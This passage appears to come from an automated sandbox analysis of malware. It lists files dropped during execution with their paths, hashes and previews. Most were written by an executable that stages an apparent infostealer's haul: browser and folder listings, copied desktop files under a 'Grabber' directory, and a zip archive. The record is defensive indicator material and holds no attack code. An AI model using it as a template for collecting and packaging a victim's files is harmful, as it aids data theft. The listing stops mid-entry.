Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DB0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4736
Entropy (8bit):	4.451193928034593
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg77aI9GZWpW8VYeZYm8M4J1NsFqm+q8veNYamDIQd:uIjfaI7Yo7V2J/mKcmDIQd
MD5:	9350659FE6CDDE9D27F47207E1563880
SHA1:	10B4D50DF78A5338F47B0B52BBD48E06AADF6D3F
SHA-256:	DABB032A6E58941B54054569C070D9A92B0EDEC3FE2D87F7F6B1DEF86F0FF25A
SHA-512:	4521DA5260E5AB56601E31888D09CF38B5A5E5A8B22ED7B5FB25F50705393DBE78A2F487E2881570871D1E29D8A2C59EAEF65811B7908C5791D97EE1F1E692CF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9724.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Tue Dec 10 10:11:28 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	346502
Entropy (8bit):	3.3223068638153794
Encrypted:	false
SSDEEP:	3072:eIxR9qTA4Xhj8RP6cSkr8UW1CCqdFW3+vYrf5Ia:D9qTASARam8fqS3QYrf
MD5:	4892F49BAB9E65FD5660879AA76E1656
SHA1:	9FCDB8A8D2EF69F8B442FABAB88FAB386CCCC792
SHA-256:	0D407B3F9F5488159471088B559E1DCA3B6CA1F96D9FEB5F7FF2252F78659F53
SHA-512:	7FDC09962F28CAD3E455D1DA6D51E36797558A85FF30B8F5200D590EBC1ABA670C4EEF676CD6C50C83B3B76D0F0AC7761DCEE36C8D92C2A9C07ACFB0727B2970
Malicious:	false
Preview:	MDMP..a..... .........Xg....................................$........................!...Z..........l.......8...........T...........H'..>"...........!...........#..............................................................................eJ......d$......Lw......................T.............Xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9957.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6552
Entropy (8bit):	3.71669556464706
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb21zUYZxUryuc7OOSN5aM4Ur89bPOmID1fD90m:R6l7wVeJ21AYZOuucOLprr89bG3pfDim
MD5:	DFC3BC00E96C302139A2B7DC6D309264
SHA1:	1BD9F6684FB18DE45C7A48492C9891EDD1DBF3CF
SHA-256:	60EF2E2D496D50A8616FEC2E86A634109638BDF342DCC36AEA0FC359FF5D32F1
SHA-512:	54E5BC7B11513718D0B6CA1D38ADB89D2966200C9518441F78954CC1E614A23A3D9A77604433B1C4767DA2D34D4EA64F310B98966C8006FBCB0567963D17A97E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER99F4.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4787
Entropy (8bit):	4.447600773464756
Encrypted:	false
SSDEEP:	48:cvIwWl8zscJg771I9GZWpW8VYx5Ym8M4JhE/sFvyq8vIE/ydbbxd:uIjfaI7Ro7VjJySWlKdbbxd
MD5:	6696A1FB29DBF355B9979CD9AC17AF14
SHA1:	6421B3988EF981A236191718AF72BBE72759E119
SHA-256:	21F9FD04800723BC1D36D034BE183A0C320F2CCC2DF76883BDE4811074A62ADA
SHA-512:	BE2C60B2208ED131DB212FA5EE7F619C5BE47EF2F0C1ABCA9F9FF3A2E0EB53F7D1A01CBBADC0B331629F33CC7DAE327990610F6A9CB33BCB48039E4FBF6B0733
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\DotNetZip-cd0ssmvx.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	161848
Entropy (8bit):	7.881957687823432
Encrypted:	false
SSDEEP:	1536:i0jWODZ3InwBIb+BnxE2bf7nG5M59FnmZLLQ8nNMt5RpOkyUHHy1dcPTcnFoMUz/:36av8YBuSkXFoMUzBfcOfZ8n5m
MD5:	C0907CD8FBAB2E38E2A2EDC3E58884C6
SHA1:	534B94F62E1F0B04056508F05F9D26F66DFD5DEE
SHA-256:	2E0C9D18FF1961E8F76313B432BD9DCA87DF7B80B0357C7462CE6826DC970862
SHA-512:	564CF3E4E2BF8B004C604B080677E1E38FC8665BE1584EB2A73436BCA8D65DB551B04B92154798AD70898B69409D842BC4727990EA06FA891E2D21329D2E4017
Malicious:	false
Preview:	PK........q).Y..............$.Browsers/.. .........t....J..t....J..t....J..PK........q).Y..............$.Browsers/Google/.. .........t....J..t....J..t....J..PK........s).Y..............$.Directories/.. .........y....J..y....J.......J..PK........s).Y.=k.9.../.....$.Directories/Desktop.txt.. ..............J.......J.......J..e..n.0.E.._._...c.&..[..R...R....nhf.;.f..;.........K.:....j#Qw=L....J..4...D.K.V.F....WR.w.L.N....+".N."../...(j-J...8W.o.:UT...^.}........k. ..7.J.:.\|t.[GF..!..b.ug.x.kR....$m,..\|Q6..$<..z4[(.g.J...Y.,..U.e...!.........].k..R0....C.hYw.....Y..`..P.<......y~.OC.....=..\|...c.M....tA......V..PK........s).Yt.q.E...B.....$.Directories/Documents.txt.. ..........%...J...%...J...%...J..e..N.0...5..\|....@...S....;@.....d}{.H]..43.\|3xlO..p._.....&....6.uc{v%,%.2..F..y)..F.....}zs....GX.h?=....5...M..%...d%GS.z..TUuP..r..M."..b...o}y.._....;.(...k..8<.vDF*~^]l}.z.h.......c~..v}.=...y.j..q.....Si.L~...<p.:tIC(.F$......9....6D.x..>...b)oL.iiV.J.

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	161848
Entropy (8bit):	7.881957687823432
Encrypted:	false
SSDEEP:	1536:i0jWODZ3InwBIb+BnxE2bf7nG5M59FnmZLLQ8nNMt5RpOkyUHHy1dcPTcnFoMUz/:36av8YBuSkXFoMUzBfcOfZ8n5m
MD5:	C0907CD8FBAB2E38E2A2EDC3E58884C6
SHA1:	534B94F62E1F0B04056508F05F9D26F66DFD5DEE
SHA-256:	2E0C9D18FF1961E8F76313B432BD9DCA87DF7B80B0357C7462CE6826DC970862
SHA-512:	564CF3E4E2BF8B004C604B080677E1E38FC8665BE1584EB2A73436BCA8D65DB551B04B92154798AD70898B69409D842BC4727990EA06FA891E2D21329D2E4017
Malicious:	false
Preview:	PK........q).Y..............$.Browsers/.. .........t....J..t....J..t....J..PK........q).Y..............$.Browsers/Google/.. .........t....J..t....J..t....J..PK........s).Y..............$.Directories/.. .........y....J..y....J.......J..PK........s).Y.=k.9.../.....$.Directories/Desktop.txt.. ..............J.......J.......J..e..n.0.E.._._...c.&..[..R...R....nhf.;.f..;.........K.:....j#Qw=L....J..4...D.K.V.F....WR.w.L.N....+".N."../...(j-J...8W.o.:UT...^.}........k. ..7.J.:.\|t.[GF..!..b.ug.x.kR....$m,..\|Q6..$<..z4[(.g.J...Y.,..U.e...!.........].k..R0....C.hYw.....Y..`..P.<......y~.OC.....=..\|...c.M....tA......V..PK........s).Yt.q.E...B.....$.Directories/Documents.txt.. ..........%...J...%...J...%...J..e..N.0...5..\|....@...S....;@.....d}{.H]..43.\|3xlO..p._.....&....6.uc{v%,%.2..F..y)..F.....}zs....GX.h?=....5...M..%...d%GS.z..TUuP..r..M."..b...o}y.._....;.(...k..8<.vDF*~^]l}.z.h.......c~..v}.=...y.j..q.....Si.L~...<p.:tIC(.F$......9....6D.x..>...b)oL.iiV.J.

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	815
Entropy (8bit):	5.21231507664705
Encrypted:	false
SSDEEP:	24:AQsGEcw5qzeEj3OuIbDmNIWCPAzD2+Gj+u:DEcTzeEj3OuI+RCPAzq+Gj+u
MD5:	73B78333D44D49D10C834E032B683805
SHA1:	A0554A26D26199698E06DCAD0D5813909A176627
SHA-256:	3F5EDB4A3A83BF081714B343590C1C0F32B2654B1CBA07F2BCFBB4B67B620F14
SHA-512:	FA679880520A80B47722C4A62989136BA9A7F11E4B4C99E4C456282BB20546B7571E778F4532E0C60F3E13907D688A48D1B1540DA6301473A4023FF608844A26
Malicious:	false
Preview:	Desktop\...BJZFPPWAPT\....BJZFPPWAPT.docx....DUUDTUBZFW.xlsx....EWZCVGNOWT.jpg....JDDHMPCDUJ.mp3....KLIZUSIQEN.png....ZGGKNSUKOP.pdf...EIVQSAOTAQ\...EWZCVGNOWT\...GRXZDKKVDB\....BJZFPPWAPT.xlsx....DUUDTUBZFW.jpg....EOWRVPQCCS.png....GRXZDKKVDB.docx....PALRGUCVEH.pdf....ZGGKNSUKOP.mp3...LIJDSFKJZG\...NWCXBPIUYI\...NYMMPCEIMA\...PALRGUCVEH\....GIGIYTFFYT.pdf....GLTYDMDUST.mp3....JDDHMPCDUJ.jpg....PALRGUCVEH.docx....ZGGKNSUKOP.xlsx....ZIPXYXWIOY.png...VWDFPKGDUF\...BJZFPPWAPT.docx...BJZFPPWAPT.xlsx...desktop.ini...DUUDTUBZFW.jpg...DUUDTUBZFW.xlsx...EOWRVPQCCS.png...EWZCVGNOWT.jpg...Excel.lnk...file.exe...GIGIYTFFYT.pdf...GLTYDMDUST.mp3...GRXZDKKVDB.docx...JDDHMPCDUJ.jpg...JDDHMPCDUJ.mp3...KLIZUSIQEN.png...PALRGUCVEH.docx...PALRGUCVEH.pdf...ZGGKNSUKOP.mp3...ZGGKNSUKOP.pdf...ZGGKNSUKOP.xlsx...ZIPXYXWIOY.png..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	5.271298025431222
Encrypted:	false
SSDEEP:	12:q1jKWcdu1NSCjcNjiljnNgL/eTgj3JSYwb84ppbLV8liHLKpj6jKRBtvzNltne/f:2QsGEcw5qzeEj3RIbDmNIWZzD2+Gj+u
MD5:	40E6E521A0F95F364BDB360DC3791379
SHA1:	1F0456A6E4E426550C4605C14536D72DB42AEB30
SHA-256:	F52EAD149CF619A62054A6A1C8CE023C484EE943C79155AE66CDA0DF67B18EF6
SHA-512:	9866DEE323AE8A714689FCB6769AC340FDCFF2CEE111BA7FEB1D587AF3768172A90D836489E6EDFACEAE6DDB2F7413CDF37655266B4C31166B430FBF3566E0AB
Malicious:	false
Preview:	Documents\...BJZFPPWAPT\....BJZFPPWAPT.docx....DUUDTUBZFW.xlsx....EWZCVGNOWT.jpg....JDDHMPCDUJ.mp3....KLIZUSIQEN.png....ZGGKNSUKOP.pdf...EIVQSAOTAQ\...EWZCVGNOWT\...GRXZDKKVDB\....BJZFPPWAPT.xlsx....DUUDTUBZFW.jpg....EOWRVPQCCS.png....GRXZDKKVDB.docx....PALRGUCVEH.pdf....ZGGKNSUKOP.mp3...LIJDSFKJZG\...My Music\...My Pictures\...My Videos\...NWCXBPIUYI\...NYMMPCEIMA\...PALRGUCVEH\....GIGIYTFFYT.pdf....GLTYDMDUST.mp3....JDDHMPCDUJ.jpg....PALRGUCVEH.docx....ZGGKNSUKOP.xlsx....ZIPXYXWIOY.png...VWDFPKGDUF\...BJZFPPWAPT.docx...BJZFPPWAPT.xlsx...desktop.ini...DUUDTUBZFW.jpg...DUUDTUBZFW.xlsx...EOWRVPQCCS.png...EWZCVGNOWT.jpg...GIGIYTFFYT.pdf...GLTYDMDUST.mp3...GRXZDKKVDB.docx...JDDHMPCDUJ.jpg...JDDHMPCDUJ.mp3...KLIZUSIQEN.png...PALRGUCVEH.docx...PALRGUCVEH.pdf...ZGGKNSUKOP.mp3...ZGGKNSUKOP.pdf...ZGGKNSUKOP.xlsx...ZIPXYXWIOY.png..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.250781190882039
Encrypted:	false
SSDEEP:	6:3tcfLdfLidpLKIajHaj8jRnBTI/qY0egbth7Aazlf1L7/e/+CfM0+L6:ajliHLKpj6jKRBtvzNltne/+Gj+u
MD5:	045E380F1A93D34F863ACFE7332A0214
SHA1:	FF92A6CAA5F6B2CB74E6BB9619DAB453E9730FAB
SHA-256:	5EEC9051F646662A0680C6645E271D680E8427BBEA317403782FF27085676102
SHA-512:	9533B6D582D46E23D136BA1D5CE3FB6BBF67AA86A09C0CC21C910472334DE57CDBD772F5D252962C287A7F19EE8AD0875386D6AE92E649E2FC73F87DFF31DD60
Malicious:	false
Preview:	Downloads\...BJZFPPWAPT.docx...BJZFPPWAPT.xlsx...desktop.ini...DUUDTUBZFW.jpg...DUUDTUBZFW.xlsx...EOWRVPQCCS.png...EWZCVGNOWT.jpg...GIGIYTFFYT.pdf...GLTYDMDUST.mp3...GRXZDKKVDB.docx...JDDHMPCDUJ.jpg...JDDHMPCDUJ.mp3...KLIZUSIQEN.png...PALRGUCVEH.docx...PALRGUCVEH.pdf...ZGGKNSUKOP.mp3...ZGGKNSUKOP.pdf...ZGGKNSUKOP.xlsx...ZIPXYXWIOY.png..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
SHA-512:	7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
Malicious:	false
Preview:	BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

C:\Users\user\AppData\Local\6ab16723971cd10f70fc77eef6520f79\user@124406_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704346314649071
Encrypted:	false
SSDEEP:	24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
MD5:	8B66CD8FCBCEB253D75DB5CDE6291FA2
SHA1:	6CE0386190B9753849299B268AA7B8D15F9F72E2
SHA-256:	51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
